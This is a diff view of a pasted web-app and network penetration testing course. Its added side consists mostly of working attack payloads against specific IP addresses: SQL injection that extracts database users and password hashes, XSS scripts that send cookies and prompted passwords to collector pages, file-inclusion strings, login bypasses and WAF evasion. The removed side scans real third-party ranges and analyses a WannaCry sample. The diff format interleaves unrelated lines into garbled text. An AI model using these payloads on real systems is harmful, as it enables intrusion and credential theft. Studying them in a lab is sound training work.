View difference between Paste ID: 1crPaSjk and JZdCHrN4
SHOW: | | - or go back to the newest paste.
1
Secure Software Development
2-
# Passive Recon #
2+
https://s3.amazonaws.com/StrategicSec-Files/SecureSoftwareDevelopment.zip
3
4
5-
- Wikipedia Page
5+
6-
	- Are they Public or Private?
6+
7-
	- Does the target have any subsidiaries?
7+
8-
    	- Have they had any scandals?
8+
# Down & Dirty App Sec #
9
########################
10-
- Robtex
10+
11-
	- Show system map
11+
Download VMWare Player if you are not currently running a version of Vmware that is newer than VMWare Workstation 11, Vmware Fusion 7, or Vmware Player 11. VMWare Player is free and you download it from here:
12
https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0
13
14
15
16
Download the course virtual machines:
17
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
18-
- I prefer to use Putty to SSH into my Linux host.
18+
username:    strategicsec
19-
- You can download Putty from here:
19+
password:    strategicsec
20-
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
20+
21
22-
Here is the information to put into putty
22+
23
Start with simple Firefox Addons:
24-
Host Name:          107.191.39.106
24+
25-
protocol:           ssh
25+
- ShowIP			https://addons.mozilla.org/en-US/firefox/addon/showip/
26-
port:               22
26+
- Server Spy			https://addons.mozilla.org/en-US/firefox/addon/server-spy/
27-
username:           ceh
27+
- FoxyProxy			https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
28-
password:           passtheceh  
28+
- Tamper Data			https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
29
- Wapalyzer			https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
30
31
A good list of web app testing add ons for Firefox:
32
https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
33
34-
---------------------------Type This-----------------------------------
34+
35
36
37
38
39
40
##################################
41
# Basic: Web Application Testing #
42-
http://whois.domaintools.com/
42+
43
44
Most people are going to tell you reference the OWASP Testing guide.
45
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
46
47-
---------------------------Type This-----------------------------------
47+
48-
dig axfr @nsztm1.digi.ninja zonetransfer.me
48+
49
50
The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
51
	
52-
./ipcrawl 148.87.1.1 148.87.1.254				
52+
	1. Does the website talk to a DB?
53
		- Look for parameter passing (ex: site.com/page.php?id=4)
54
		- If yes - try SQL Injection
55
56
	2. Can I or someone else see what I type?
57
		- If yes - try XSS
58
59
	3. Does the page reference a file?
60
		- If yes - try LFI/RFI
61
62
Let's start with some manual testing against 54.149.82.150
63
64
65
Start here:
66
http://54.149.82.150/
67-
# Scanning Methodology #
67+
68
69
There's no parameter passing on the home page so the answer to question 1 is NO.
70-
- Ping Sweep
70+
There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
71-
What's alive?
71+
72-
------------
72+
Try an XSS in the search box on the home page:
73
<script>alert(123);</script>
74-
---------------------------Type this command-----------------------------------
74+
75-
sudo nmap -sP 157.166.226.*
75+
Doing this gives us the following in the address bar:
76-
-------------------------------------------------------------------------------
76+
http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>
77
78
Ok, so we've verified that there is XSS in the search box. 
79
80-
   -if -SP yields no results try:
80+
Let's move on to the search box in the left of the page.
81-
---------------------------Type this command-----------------------------------
81+
82-
sudo nmap -sL 157.166.226.*
82+
Let's give the newsletter signup box a shot
83-
-------------------------------------------------------------------------------
83+
84
Moving on to the login page.
85
http://54.149.82.150/login.aspx
86
87-
   -Look for hostnames:
87+
I entered a single quote (') for both the user name and the password. I got the following error:
88-
---------------------------Type this command-----------------------------------
88+
89-
sudo nmap -sL 157.166.226.* | grep cnn
89+
90-
-------------------------------------------------------------------------------
90+
91
http://54.149.82.150/bookdetail.aspx?id=2'
92
93
94-
- Port Scan
94+
95-
What's where?
95+
96-
------------
96+
97-
---------------------------Type this command-----------------------------------
97+
98-
sudo nmap -sS 162.243.126.247
98+
99-
-------------------------------------------------------------------------------
99+
100
101
102
103-
- Bannergrab/Version Query
103+
104-
What versions of software are running
104+
105-
-------------------------------------
105+
106
107-
---------------------------Type this command-----------------------------------
107+
108-
sudo nmap -sV 162.243.126.247
108+
109-
-------------------------------------------------------------------------------
109+
110
#############################################################################
111
# SQL Injection                                                             #
112
# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
113
#############################################################################
114-
- Vulnerability Research
114+
115-
Lookup the banner versions for public exploits
115+
116-
----------------------------------------------
116+
117-
https://www.exploit-db.com/search
117+
118-
http://securityfocus.com/bid
118+
119-
https://packetstormsecurity.com/files/tags/exploit/
119+
120
# Error-Based SQL Injection #
121
#############################
122
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
123-
Network Penetration Testing Process (known vulnerabilities)
123+
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
124-
-----------------------------------------------------------
124+
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
125
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
126
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
127-
1. Ping Sweep:
127+
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- 	NOTE: "N" - just means to keep going until you run out of databases
128-
The purpose of this step is to identify live hosts
128+
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
129
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
130-
    nmap -sP <ip-address/ip-range>
130+
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
131
132
133-
2. Port Scan
133+
134-
Identify running services. We use the running services to map the network topology.
134+
135
#############################
136-
    nmap -sS <ip-address/ip-range>
136+
137
#############################
138
http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
139-
3. Bannergrab
139+
http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
140-
Identify the version of version of software running on each port
140+
http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
141
http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
142-
    nmap -sV <ip-address/ip-range>
142+
http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
143-
   
143+
http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
144
http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
145
http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
146-
4. Vulnerability Research
146+
http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
147-
Use the software version number to research and determine if it is out of date (vulnerable).
147+
http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
148
149-
    exploit-db.com/search
149+
	We are using a union select statement because we are joining the developer's query with one of our own.
150
	Reference: 
151
	http://www.techonthenet.com/sql/union.php
152
	The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements. 
153
	It removes duplicate rows between the various SELECT statements.
154
155
	Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
156
157
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
158
159-
Skill Level 1. Run the scanners
159+
	Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
160-
-------------------------------
160+
161-
    Nexpose
161+
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
162-
    Qualys
162+
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
163-
    Retina
163+
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
164-
    Nessus              known vulnerabilities
164+
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
165-
    OpenVas
165+
166-
    Foundscan
166+
167-
    GFI LanGuard
167+
168-
    NCircle
168+
169
170
- Another way is to see if you can get the backend to perform an arithmetic function
171-
Skill Level 2. Manual vulnerability validation (known vulnerabilities)
171+
http://54.149.82.150/bookdetail.aspx?id=(2)	
172
http://54.149.82.150/bookdetail.aspx?id=(4-2)	
173
http://54.149.82.150/bookdetail.aspx?id=(4-1)
174-
    windows ->  systeminfo
174+
175-
    Linux->     dpkg -l
175+
176-
                rpm -qa
176+
177
http://54.149.82.150/bookdetail.aspx?id=2 or 1=1-- 
178-
	Mac OS X -> sudo find / -iname *.app
178+
http://54.149.82.150/bookdetail.aspx?id=2 or 1=2-- 
179
http://54.149.82.150/bookdetail.aspx?id=1*1 
180
http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1# 
181
http://54.149.82.150/bookdetail.aspx?id=2 or 1<99# 
182
http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1# 
183
http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3-- 
184
http://54.149.82.150/bookdetail.aspx?id=2 &0#
185
186
187-
	- http://toolbar.netcraft.com/site_report
187+
188-
	- https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
188+
189
190
###############################
191
# Blind SQL Injection Testing #
192-
---------------------------Type This-----------------------------------
192+
193-
dig microsoft.com
193+
194
  	 
195
3 - Total Characters
196-
bash lbd.sh microsoft.com
196+
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
197
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
198
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- 		(Ok, the username is 3 chars long - it waited 10 seconds)
199
200
Let's go for a quick check to see if it's DBO
201
http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
202
203
Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
204
205
D  - 1st Character
206
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- 	
207
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
208-
---------------------------Type This-----------------------------------
208+
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
209
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- 	(Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
210-
wafw00f http://www.oracle.com
210+
211-
wafw00f https://www.cnn.com
211+
212-
wafw00f https://cnn.com
212+
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds
213-
wafw00f https://www.infosecaddicts.com
213+
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds
214
 
215
O - 3rd Character
216
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds
217
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
218
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds
219
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds
220
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
221
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds
222-
sudo nmap -p 80 --script http-waf-detect.nse 
222+
223
224
225
226
227
228-
# Scanning Methodology #
228+
229
230
231-
- Ping Sweep
231+
232-
What's alive?
232+
###################################################################
233-
------------
233+
# What is XSS                                                     #
234
# https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
235-
---------------------------Type This-----------------------------------
235+
###################################################################
236-
sudo nmap -sP 157.166.226.*
236+
237
OK - what is Cross Site Scripting (XSS)
238
239
1. Use Firefox to browse to the following location:
240
241
	http://54.172.112.249/xss_practice/
242-
	-if -SP yields no results try:
242+
243-
---------------------------Type This-----------------------------------
243+
	A really simple search page that is vulnerable should come up. 
244-
sudo nmap -sL 157.166.226.*
244+
245
246
247
248
2. In the search box type:
249
	
250-
	-Look for hostnames:
250+
	<script>alert('So this is XSS')</script>
251-
---------------------------Type This-----------------------------------
251+
252-
sudo nmap -sL 157.166.226.* | grep com
252+
253
	This should pop-up an alert window with your message in it proving XSS is in fact possible.
254
	Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
255
256
257
3. In the search box type:
258-
- Port Scan
258+
	
259-
What's where?
259+
	<script>alert(document.cookie)</script>
260-
------------
260+
261-
---------------------------Type This-----------------------------------
261+
262-
sudo nmap -sS 162.243.126.247
262+
	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
263
	Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
264
265
4. Now replace that alert script with:
266
267
	<script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script> 
268-
- Bannergrab/Version Query
268+
269-
What versions of software are running
269+
270-
-------------------------------------
270+
271
272-
---------------------------Type This-----------------------------------
272+
273-
sudo nmap -sV 162.243.126.247
273+
274
	http://54.172.112.249/xss_practice/cookie_stealer_logs.html
275
276
277
The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
278
279
280-
- Vulnerability Research
280+
281-
Lookup the banner versions for public exploits
281+
282-
----------------------------------------------
282+
283-
http://exploit-db.com
283+
284-
http://securityfocus.com/bid
284+
285-
https://packetstormsecurity.com/files/tags/exploit/
285+
286
############################
287
288-
                            ###################################A###############
288+
289-
----------- ############### # Day 2: Software Exploitation & Malware Analysis # ############### -----------
289+
290-
                            ###################################################
290+
291
292
Use Firefox to browse to the following location:
293-
# Scanning Methodology #
293+
294
	http://54.172.112.249/xss_practice/
295
296-
- Ping Sweep
296+
297-
What's alive?
297+
298-
------------
298+
299
----------------------------
300-
---------------------------Type this command-----------------------------------
300+
301-
sudo nmap -sP 157.166.226.*
301+
302-
-------------------------------------------------------------------------------
302+
303
--------
304
305
<script>
306-
   -if -SP yields no results try:
306+
password=prompt('Your session is expired. Please enter your password to continue',' '); 
307-
---------------------------Type this command-----------------------------------
307+
document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
308-
sudo nmap -sL 157.166.226.*
308+
309-
-------------------------------------------------------------------------------
309+
310
311
Now view the stolen cookie at:
312
	http://54.172.112.249/xss_practice/passwords.html
313-
   -Look for hostnames:
313+
314-
---------------------------Type this command-----------------------------------
314+
315-
sudo nmap -sL 157.166.226.* | grep cnn
315+
316-
-------------------------------------------------------------------------------
316+
317
--------
318
<script>
319
username=prompt('Please enter your username',' ');
320-
- Port Scan
320+
321-
What's where?
321+
document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
322-
------------
322+
323-
---------------------------Type this command-----------------------------------
323+
324-
sudo nmap -sS 162.243.126.247
324+
325-
-------------------------------------------------------------------------------
325+
326
327
Now view the stolen cookie at:
328
http://54.172.112.249/xss_practice/username_password_logs.html
329-
- Bannergrab/Version Query
329+
330-
What versions of software are running
330+
331-
-------------------------------------
331+
332
333-
---------------------------Type this command-----------------------------------
333+
334-
sudo nmap -sV 162.243.126.247
334+
# Let's kick it up a notch with ASP.NET #
335-
-------------------------------------------------------------------------------
335+
# http://54.200.178.220/                #
336
#########################################
337
338
339
The trading Web App is on http://54.200.178.220/
340-
- Vulnerability Research
340+
341-
Lookup the banner versions for public exploits
341+
342-
----------------------------------------------
342+
Try the following in the search box:
343-
https://www.exploit-db.com/search
343+
	<script>alert(123);</script>
344-
http://securityfocus.com/bid
344+
	' or 1=1
345-
https://packetstormsecurity.com/files/tags/exploit/
345+
	' and a=a
346
	1=1
347
	Joe'+OR+1=1;--
348
349-
Network Penetration Testing Process (known vulnerabilities)
349+
350-
-----------------------------------------------------------
350+
	<script>alert(123);</script>
351
	
352
Open a new tab in firefox and try this:
353-
1. Ping Sweep:
353+
	http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
354-
The purpose of this step is to identify live hosts
354+
355
356-
    nmap -sP <ip-address/ip-range>
356+
Try the contact us form.
357
Open a new tab in firefox and try this:
358
	http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
359-
2. Port Scan
359+
360-
Identify running services. We use the running services to map the network topology.
360+
Try this on the inquiry form:
361
	Joe McCray
362-
    nmap -sS <ip-address/ip-range>
362+
	1234567890
363
	joe@strategicsec.com') waitfor delay '00:00:10'--
364
365-
3. Bannergrab
365+
366-
Identify the version of version of software running on each port
366+
Login Box:
367
368-
    nmap -sV <ip-address/ip-range>
368+
	' or 1=1 or ''='
369-
   
369+
	anything   			(click login instead of pressing enter)
370
371
372-
4. Vulnerability Research
372+
373-
Use the software version number to research and determine if it is out of date (vulnerable).
373+
Tamper Data: (notice 2 session IDs)
374
375-
    exploit-db.com/search
375+
	AcmeTrading=a4b796687b846dd4a34931d708c62b49; 		SessionID is md5
376
	IsAdmin=yes; 
377
	ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
378
379
380
381
Profile - Detail	(tamper data)
382
	Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
383
	joe|set
384
385-
Skill Level 1. Run the scanners
385+
386-
-------------------------------
386+
	xss_upload.txt (Upload Bulk Order)
387-
    Nexpose
387+
	<script>alert(123);</script>
388-
    Qualys
388+
389-
    Retina
389+
390-
    Nessus              known vulnerabilities
390+
391-
    OpenVas
391+
392-
    Foundscan
392+
393-
    GFI LanGuard
393+
394-
    NCircle
394+
395
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
396
397-
Skill Level 2. Manual vulnerability validation (known vulnerabilities)
397+
398
399
400-
    windows ->  systeminfo
400+
401-
    Linux->     dpkg -l
401+
402-
                rpm -qa
402+
403
404
Step 3: When you load your fuzz strings - use the following decision tree
405
406
	- Are the fuzz strings causing a default error message (example 404)?
407
		- If this is the case then it is most likely NOT vulnerable
408
409
	- Are the fuzz strings causing a WAF or LB custom error message?
410-
#####################################
410+
		- If this is the case then you need to find an encoding method to bypass
411-
# Quick Stack Based Buffer Overflow #
411+
412-
#####################################
412+
413
	- Are the fuzz strings causing an error message that discloses the backend type?
414-
- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
414+
		- If yes, then identify DB type and find correct syntax to successfully exploit
415-
http://45.63.104.73/ExploitLab.zip
415+
		- Some example strings that I use are:
416
			'
417
			"
418-
- Extract the ExploitLab.zip file to your Desktop
418+
			()       	<----- Take the parameter value and put it in parenthesis
419
			(5-1)	 	<----- See if you can perform an arithmetic function
420-
- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
420+
421
422
	- Are the fuzz strings rendering executable code?
423
		- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
424-
---------------------------Type This-----------------------------------
424+
		- Some example strings that I use are:
425
			<b>hello</b>
426-
--------------------------------------------------------------------------
426+
			<u>hello</u>
427
			<script>alert(123);</script>
428
			<script>alert(xss);</script>
429
			<script>alert('xss');</script>
430
			<script>alert("xss");</script>
431-
- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
431+
432
433
		
434
435
436
437
############################
438
# Trading Web App with WAF #
439
# http://54.213.131.105    #
440-
- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
440+
441
442-
- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
442+
443
Try the following in the search box:
444
	<script>alert(123);</script>
445
	<script>alert(123);</script
446
	<script>alert(123)
447
	<script>alert
448
	<script>
449
	<script
450
	<scrip
451
	<scri
452
	<scr
453
	<sc
454
	<s
455
	<p
456
	<
457
	< s
458
	Joe'+OR+1=1;--
459
460
	
461
Open a new tab in firefox and try this:
462
	http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
463
464
465
	xss_upload.txt (Upload Bulk Order)
466
	<script>alert(123);</script>
467
468
469
Login Box:
470
471-
Skill Level 3. Identify unknown vulnerabilities
471+
	' or 1=1 or ''='
472-
-----------------------------------------------
472+
	anything
473
474-
- App Type
474+
475-
------------
475+
476-
   Stand Alone             Client Server               Web App
476+
Tamper Data: (notice 2 session IDs)
477
478-
                       ***(vulnerserver.exe)***
478+
	AcmeTrading=a4b796687b846dd4a34931d708c62b49; 		SessionID is md5
479
	IsAdmin=yes; 
480
	ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
481-
- Input TYpe
481+
482-
-------------
482+
483-
   FIle                    logical network port            Browser
483+
484-
   Keyboard
484+
Profile - Detail	(tamper data)
485-
   Mouse
485+
	Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
486
	joe|set
487
488
489-
                       ***(9999)***
489+
490
491
492-
- Map & Fuzz app entry points:
492+
493
494-
   - Commands              ***(commands)***
494+
###########################################################
495-
   - Methods
495+
# Attacking an Oracle/JSP based WebApp with SQL Injection #
496-
   - Verbs
496+
###########################################################
497-
   - functions
497+
498-
   - subroutines
498+
499-
   - controllers
499+
500
501
502-
- Isolate the crash
502+
http://54.69.156.253:8081/bookcompany/
503-
-------------------
503+
504-
App seems to reliably crash at TRUN 2100
504+
505
user:	a' OR 'a'='a
506
pass:	a' OR 'a'='a
507-
- Calculate the distance to EIP
507+
508-
-------------------------------
508+
509-
Distance to EIP is 2006
509+
510
511-
We found that EIP was populated with the value: 396F4338
511+
512-
396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
512+
513
514-
An online tool that we can use for this is:
514+
http://54.69.156.253:8081/bookcompany/author.jsp?id=111
515-
https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
515+
516
517
[ Search by Username ]	Joe' OR 'a'='a
518
519-
- Redirect Program Execution
519+
520
521-
A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
521+
522-
We learned that we control EAX and ESP in script 2.
522+
523
524
525
526
527
528-
- Implement Shellcode
528+
529-
---------------------
529+
530-
There are only 2 things that can go wrong with shellcode:
530+
http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
531-
- Not enough space
531+
532-
- Bad characters
532+
533
534
http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
535
536
537
538
539
540-
# FreeFloat FTP Server Exploit Analysis #
540+
541
542
543
544
545-
Analyze the following exploit code:
545+
546-
https://www.exploit-db.com/exploits/15689/
546+
547
548-
1. What is the target platform that this exploit works against?
548+
549-
2. What is the variable name for the distance to EIP?
549+
550-
3. What is the actual distance to EIP in bytes?
550+
http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
551-
4. Describe what is happening in the variable ‘junk2’
551+
552
553
Host is running:
554
555
556-
Analysis of the training walk-through based on EID: 15689:
556+
557-
http://45.63.104.73/ff.zip
557+
558
559
http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
560
561
User is:
562-
ff1.py
562+
563-
1. What does the sys module do?
563+
564-
2. What is sys.argv[1] and sys.argv[2]?
564+
565-
3. What application entry point is being attacked in this script?
565+
566
567
http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
568
569-
ff2.py
569+
Current database is:
570-
1. Explain what is happening in lines 18 - 20 doing.
570+
571-
2. What is pattern_create.rb doing and where can I find it?
571+
572-
3. Why can’t I just double click the file to run this script?
572+
573
574
575
576-
ff3.py
576+
577-
1. Explain what is happening in lines 17 - to 25?
577+
578-
2. Explain what is happening in lines 30 - to 32?
578+
579-
3. Why is everything below line 35 commented out?
579+
580
581
sudo /sbin/iptables -F
582
cd /home/strategicsec/toolz
583-
ff4.py
583+
584-
1. Explain what is happening in lines 13 to 15.
584+
585-
2. Explain what is happening in line 19.
585+
586-
3. What is the total length of buff?
586+
587
# Target IP Determination #
588
###########################
589
590-
ff5.py
590+
591-
1. Explain what is happening in line 15.
591+
592-
2. What is struct.pack?
592+
593-
3. How big is the shellcode in this script?
593+
http://www.networksolutions.com/whois/index.jsp
594
595
cd ~/toolz/fierce2
596
fierce -dns motorola.com
597-
ff6.py
597+
cd ..
598-
1. What is the distance to EIP?
598+
599-
2. How big is the shellcode in this script?
599+
600-
3. What is the total byte length of the data being sent to this app?
600+
dig axfr heartinternet.co.uk  @ns.heartinternet.co.uk
601
602
603
cd ~/toolz/
604
./ipcrawl 148.87.1.1 148.87.1.254				(DNS forward lookup against an IP range)
605-
ff7.py
605+
606-
1. What is a tuple in python?
606+
607-
2. How big is the shellcode in this script?
607+
608-
3. Did your app crash in from this script?
608+
609
610
sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255		Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html
611
612
613-
ff8.py
613+
614-
1. How big is the shellcode in this script?
614+
615-
2. What is try/except in python?
615+
616-
3. What is socket.SOCK_STREAM in Python?
616+
617
618
Here are some options to use for identifying load balancers:
619
	- news.netcraft.com
620-
ff9.py
620+
	- Firefox LiveHTTP Headers
621-
1. What is going on in lines 19 and 20?
621+
622-
2. What is the length of the NOPs?
622+
623-
3. From what DLL did the address of the JMP ESP come from?
623+
624
625
dig google.com
626
627
cd ~/toolz
628-
ff010.py
628+
./lbd-0.1.sh google.com
629-
1. What is going on in lines 18 - 20?
629+
630-
2. What is going on in lines 29 - 32?
630+
631-
3. How would a stack adjustment help this script?
631+
632
halberd motorola.com
633
halberd oracle.com
634
635-
#################################
635+
636-
# The malware analysis scenario #
636+
637-
#################################
637+
# Intrusion Prevention Detection #
638-
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
638+
639
640
641-
The fastest thing you can do is perform static analysis.
641+
osstmm-afd -P HTTP -t www.strategicsec.com -v
642
643
cat /etc/xinetd.d/ssltest
644
645
cat /home/strategicsec/toolz/ssl_proxy.sh
646-
# Static Analysis #
646+
647
service xinetd status
648
649
osstmm-afd -P HTTP -t 127.0.0.1 -p 8888 -v
650
651
****** If you are getting your IP blocked you can use a service like AceVPN to give you multiple IPs to launches your tests from. ******
652-
---------------------------Type This-----------------------------------
652+
653-
file wannacry.exe
653+
654
655-
hexdump -n 2 -C wannacry.exe
655+
656
# Web Application Firewall Detection #
657
######################################
658
659
cd ~/toolz/wafw00f
660
python wafw00f.py http://www.oracle.com
661
python wafw00f.py http://www.strategicsec.com
662-
Reference:
662+
663
664
cd ~/toolz/
665
sudo nmap -p 80 --script http-waf-detect.nse oracle.com
666
667-
---------------------------Type This-----------------------------------
667+
668
669-
objdump -x wannacry.exe
669+
670
671-
strings wannacry.exe
671+
672
#######################################################
673-
strings --all wannacry.exe | head -n 6
673+
# Day 1: 3rd Party Scanning, and scanning via proxies #
674
#######################################################
675-
strings wannacry.exe | grep -i dll
675+
676
http://www.shodanhq.com/
677-
strings wannacry.exe | grep -i library
677+
678
	Create a FREE account and login
679-
strings wannacry.exe | grep -i reg
679+
680
	net:129.188.8.0/24
681-
strings wannacry.exe | grep -i key
681+
682
683-
strings wannacry.exe | grep -i rsa
683+
684
cd /home/strategicsec/toolz/
685-
strings wannacry.exe | grep -i open
685+
perl proxyfinder-0.3.pl multiproxy 3 proxies.txt	<-- This takes a long time to run
686
687-
strings wannacry.exe | grep -i get
687+
688
689-
strings wannacry.exe | grep -i mutex
689+
sudo vi /etc/proxychains.conf				<--- Make sure that last line of the file is: ocks4  127.0.0.1 9050
690
691-
strings wannacry.exe | grep -i irc
691+
692
693-
strings wannacry.exe | grep -i join        
693+
694
----------------------------------------------------------------------
695-
strings wannacry.exe | grep -i admin
695+
vi ~/toolz/fix-proxychains-dns.sh
696
697-
strings wannacry.exe | grep -i list
697+
#!/bin/bash
698
# This script is called by proxychains to resolve DNS names
699
# DNS server used to resolve names
700-
pe info wannacry.exe
700+
# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
701-
pe check wannacry.exe
701+
DNS_SERVER=4.2.2.2
702-
pe dump --section text wannacry.exe
702+
703-
pe dump --section data wannacry.exe
703+
if [ $# = 0 ] ; then
704-
pe dump --section rsrc wannacry.exe
704+
echo " usage:"
705-
pe dump --section reloc wannacry.exe
705+
echo " proxyresolv <hostname> "
706-
strings rdata | less
706+
exit
707-
strings rsrc | less
707+
fi
708-
